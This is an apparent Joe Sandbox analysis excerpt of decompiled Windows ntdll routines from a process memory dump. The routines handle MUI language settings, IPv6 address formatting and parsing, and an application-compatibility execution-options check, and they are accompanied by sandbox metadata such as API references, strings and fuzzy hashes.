				if(E01F48460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01F4718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01F48460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01F48460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01F48460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01F4718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01F2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01F22340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01F3E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01F2E2A8(_t322,  &_v68, _v16);
								if(E01F45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01F3E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01F2E2A8(_t322,  &_v68, _t236);
								if(E01F45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01F4718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01F2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01F22340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01F3E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01F2E2A8(_v12,  &_v68, _v16);
							if(E01F45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01F3E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01F2E2A8(_t322,  &_v68, _t269);
							if(E01F45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01F4718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01F2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01F22340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01F3E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01F2E2A8(_v12,  &_v68, _v16);
						if(E01F45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01F3E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01F2E2A8(_t322,  &_v68, _t296);
						if(E01F45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01F2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x01f48788
0x01f48788
0x01f48791
0x01f48794
0x01f48798
0x01f4879b
0x01f4879e
0x01f487a1
0x01f487a4
0x01f487a7
0x01f487aa
0x01f487af
0x01f91ad3
0x01f48b0a
0x01f48b0d
0x01f48b13
0x01f48b19
0x01f48b1f
0x01f48b25
0x01f48b2b
0x01f48b31
0x01f48b37
0x01f48b3d
0x01f48b46
0x01f48b46
0x01f487c6
0x01f487d0
0x01f91ae0
0x01f91ae6
0x01f91af8
0x01f91af8
0x01f91afd
0x01f91afe
0x01f91b01
0x01f91b06
0x01f91b06
0x01f487d6
0x01f487f2
0x01f487f7
0x01f48807
0x01f4880a
0x01f4880f
0x01f48810
0x01f48813
0x01f48818
0x01f48818
0x01f4882c
0x01f48831
0x01f48838
0x01f48908
0x01f48920
0x01f489f0
0x01f48a08
0x01f48af6
0x01f48af6
0x01f48af8
0x01f48afb
0x01f91beb
0x01f91beb
0x01f48b04
0x01f91bf8
0x01f91c0e
0x01f91c13
0x01f91c16
0x01f91c16
0x01f91bf8
0x00000000
0x01f48b04
0x01f48a0e
0x01f48a11
0x01f48a14
0x01f48a15
0x01f48a18
0x01f48a22
0x01f48b59
0x01f48a28
0x01f48a3c
0x01f48a3c
0x01f48a42
0x01f91bb0
0x01f91b11
0x01f91b11
0x00000000
0x01f48a48
0x01f48a51
0x01f48a5b
0x01f48a5e
0x01f48a61
0x01f48a69
0x01f48a69
0x01f48a6d
0x00000000
0x00000000
0x01f48a74
0x01f48a7c
0x01f48a7d
0x01f48a91
0x01f48a93
0x01f48a93
0x01f48a98
0x01f48a9b
0x01f48aa1
0x01f48aa1
0x01f48aa4
0x01f48aaa
0x01f48ab1
0x01f48ac5
0x01f48ac7
0x01f48ac7
0x01f48ac5
0x01f48ace
0x01f91bc9
0x01f91bce
0x01f91bd2
0x01f91bd2
0x01f48ad8
0x01f48aeb
0x01f48aeb
0x01f48af0
0x01f48af4
0x00000000
0x01f48af4
0x01f48a42
0x01f48926
0x01f48929
0x01f4892c
0x01f4892d
0x01f48930
0x01f48935
0x01f4893a
0x01f48b51
0x01f48940
0x01f48954
0x01f48954
0x01f4895a
0x01f91b63
0x00000000
0x01f48960
0x01f48969
0x01f48973
0x01f48976
0x01f48979
0x01f4897e
0x01f48981
0x01f48981
0x01f48986
0x00000000
0x00000000
0x01f91b6e
0x01f91b74
0x01f91b7b
0x01f91b8f
0x01f91b91
0x01f91b91
0x01f91b99
0x01f91b9c
0x01f91ba2
0x01f91ba2
0x01f4898c
0x01f48992
0x01f48999
0x01f489ad
0x01f91ba8
0x01f91ba8
0x01f489ad
0x01f489b6
0x01f489c8
0x01f489cd
0x01f489d0
0x01f489d0
0x01f489d6
0x01f489e8
0x01f489e8
0x01f489ed
0x00000000
0x01f489ed
0x01f4895a
0x01f4883e
0x01f48841
0x01f48844
0x01f48845
0x01f48848
0x01f4884d
0x01f48852
0x01f48b49
0x01f48858
0x01f4886c
0x01f4886c
0x01f48872
0x01f91b0e
0x00000000
0x01f48878
0x01f48881
0x01f4888b
0x01f4888e
0x01f48891
0x01f48896
0x01f48899
0x01f48899
0x01f4889e
0x00000000
0x00000000
0x01f91b21
0x01f91b27
0x01f91b2e
0x01f91b42
0x01f91b44
0x01f91b44
0x01f91b4c
0x01f91b4f
0x01f91b55
0x01f91b55
0x01f488a4
0x01f488aa
0x01f488b1
0x01f488c5
0x01f91b5b
0x01f91b5b
0x01f488c5
0x01f488ce
0x01f488e0
0x01f488e5
0x01f488e8
0x01f488e8
0x01f488ee
0x01f48900
0x01f48900
0x01f48905
0x00000000
0x01f48905

APIs

_wcspbrk.LIBCMT ref: 01F48891
_wcspbrk.LIBCMT ref: 01F48979
_wcspbrk.LIBCMT ref: 01F48A61
_wcspbrk.LIBCMT ref: 01F48A9B
_wcspbrk.LIBCMT ref: 01F91B9C

Strings

Kernel-MUI-Language-Allowed, xrefs: 01F48827
Kernel-MUI-Language-SKU, xrefs: 01F489FC
WindowsExcludedProcs, xrefs: 01F487C1
Kernel-MUI-Language-Disallowed, xrefs: 01F48914
Kernel-MUI-Number-Allowed, xrefs: 01F487E6

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: f5cea37f09361ea6c390d991fdb047abbe6f4f9fbe0cce4f1df1f4c30db1aada
Instruction ID: 19a95c944834df6be74d5185503f6459ef2c0b5d67b3977a8a56159df01988de
Opcode Fuzzy Hash: f5cea37f09361ea6c390d991fdb047abbe6f4f9fbe0cce4f1df1f4c30db1aada
Instruction Fuzzy Hash: 41F107B2D0020AEFDF11EFD9C9809EEBBB9FF18340F14446AE605A7211E7369A45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01F613CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E01F613CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01F57707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1f22926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01F57707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1f29cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01F57707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01F57707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01F57707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01F57707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x01f613d5
0x01f613d9
0x01f613dc
0x01f613de
0x01f613e1
0x01f613e8
0x01f613ee
0x01f8e8fd
0x00000000
0x01f8e921
0x01f8e921
0x01f8e928
0x01f8e982
0x01f8e98a
0x00000000
0x01f8e99a
0x01f8e99e
0x01f8e9a3
0x01f8e9a8
0x01f8e9b9
0x01f8e978
0x00000000
0x01f8e978
0x01f8e98a
0x01f8e92a
0x01f8e931
0x01f8e944
0x01f8e944
0x01f8e950
0x01f8e954
0x01f8e959
0x01f8e95e
0x01f8e963
0x01f8e970
0x00000000
0x01f8e975
0x01f8e93b
0x01f8e980
0x00000000
0x01f8e980
0x01f8e942
0x01f8e94b
0x00000000
0x01f8e94b
0x00000000
0x01f8e942
0x01f613f4
0x01f613f4
0x01f613f9
0x01f613fc
0x01f613ff
0x01f61406
0x01f8e9cc
0x01f8e9d2
0x01f8e9d2
0x01f8e9cc
0x01f6140c
0x01f61411
0x01f61431
0x01f6143a
0x01f6143c
0x01f6143f
0x01f6143f
0x01f61442
0x01f61447
0x01f614a8
0x01f614ac
0x01f8e9e2
0x01f8e9e7
0x01f8e9ec
0x01f8ea05
0x01f8ea05
0x00000000
0x01f61449
0x00000000
0x01f61449
0x01f6144c
0x01f61459
0x01f61462
0x01f61469
0x01f6146a
0x01f61470
0x01f61473
0x01f61476
0x01f61476
0x01f61490
0x01f61495
0x01f6138e
0x01f61390
0x01f61397
0x01f61398
0x01f61399
0x01f613a1
0x01f613a4
0x01f613a4
0x01f61498
0x01f6149c
0x01f6149f
0x01f614a2
0x00000000
0x00000000
0x01f614a4
0x00000000
0x01f614a4
0x01f61413
0x01f61415
0x01f61416
0x01f61419
0x01f6141c
0x01f61422
0x01f613b7
0x01f613bc
0x01f613bf
0x01f613bf
0x01f613c2
0x01f61424
0x01f61424
0x01f61424
0x01f61427
0x01f6142b
0x01f6142c
0x01f6142c
0x01f6142c
0x00000000
0x01f6141c
0x01f61411

APIs

___swprintf_l.LIBCMT ref: 01F6146B
___swprintf_l.LIBCMT ref: 01F61490
___swprintf_l.LIBCMT ref: 01F8E970

Strings

::%hs%u.%u.%u.%u, xrefs: 01F8E967
ffff:, xrefs: 01F8E94B
::ffff:0:%u.%u.%u.%u, xrefs: 01F8E9B0
:%u.%u.%u.%u, xrefs: 01F8E9F4

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 86621f6966304ed214e83797eed41d223fcf475b52adafc0caa561e8a35a5d29
Instruction ID: 6e364467696f36857341bc8a67839df7228f4a1a9a779698c84d51539ccf8a67
Opcode Fuzzy Hash: 86621f6966304ed214e83797eed41d223fcf475b52adafc0caa561e8a35a5d29
Instruction Fuzzy Hash: 4C6155B1D08666EACB34DF6DC8808BEBBB9EFD5300B54C12DE5D647641D372A640CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01F57EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E01F57EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2002088; // 0x77743dc9
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01F57F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01F73F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01F2DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2004218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01F73F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01F30D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01F73F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01F38375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01F73F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01F9E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01F73F92();
					_t38 = 1;
					L2:
					return E01F2E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x01f57f08
0x01f57f0f
0x01f57f12
0x01f57f1b
0x01f57f31
0x01f73ead
0x01f73eb4
0x00000000
0x00000000
0x01f73eba
0x01f73ecd
0x01f73ed2
0x01f73ee1
0x01f73ee7
0x01f73eec
0x01f73f12
0x01f73f18
0x01f73f1a
0x00000000
0x00000000
0x01f73f20
0x01f73f26
0x01f73f28
0x00000000
0x00000000
0x01f73f2e
0x01f73f30
0x00000000
0x00000000
0x01f73f3a
0x01f73f3b
0x01f73f53
0x01f73f64
0x01f73f69
0x01f73f6c
0x01f73f6d
0x01f73f6f
0x01f7e304
0x01f7e30f
0x01f7e315
0x01f7e31e
0x01f7e321
0x01f7e327
0x01f7e329
0x00000000
0x00000000
0x00000000
0x00000000
0x01f7e32f
0x01f7e32f
0x01f7e337
0x01f7e33a
0x01f7e33b
0x01f7e33d
0x01f7e33f
0x01f7e341
0x01f7e341
0x01f7e34e
0x01f7e353
0x01f7e358
0x01f7e35d
0x01f7e35f
0x00000000
0x00000000
0x01f7e365
0x01f7e365
0x01f7e368
0x01f7e36e
0x00000000
0x00000000
0x01f7e374
0x01f7e32f
0x01f73f75
0x01f73f7a
0x01f73f7c
0x01f73f7e
0x01f73f86
0x01f57f39
0x01f57f47
0x01f57f47
0x01f57f37
0x01f57f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F73F12

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F7E2FB
Execute=1, xrefs: 01F73F5E
ExecuteOptions, xrefs: 01F73F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F73EC4
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F73F4A
CLIENT(ntdll): Processing section info %ws..., xrefs: 01F7E345
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F73F75

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 26422e0e026eac0bffecf8c5b5423aeaffbe6ce48e7797c695a226ecb91fcda8
Instruction ID: 76163671c6127f304aadc4503df275bf25d5edb15e636c4c0d69eed19f9a0d00
Opcode Fuzzy Hash: 26422e0e026eac0bffecf8c5b5423aeaffbe6ce48e7797c695a226ecb91fcda8
Instruction Fuzzy Hash: 6E41DC71A4031DBADF20EA94DCC5FDA73FCAF14700F4005AAF605E6081EB72DA468BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01F60B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01F60B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01F38980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01F2DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01F60CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01F60CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01F606BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01F606BA(_t135, _t178) == 0 || E01F60A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01F60CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01F60CFA(_v28, 0, 0x10);
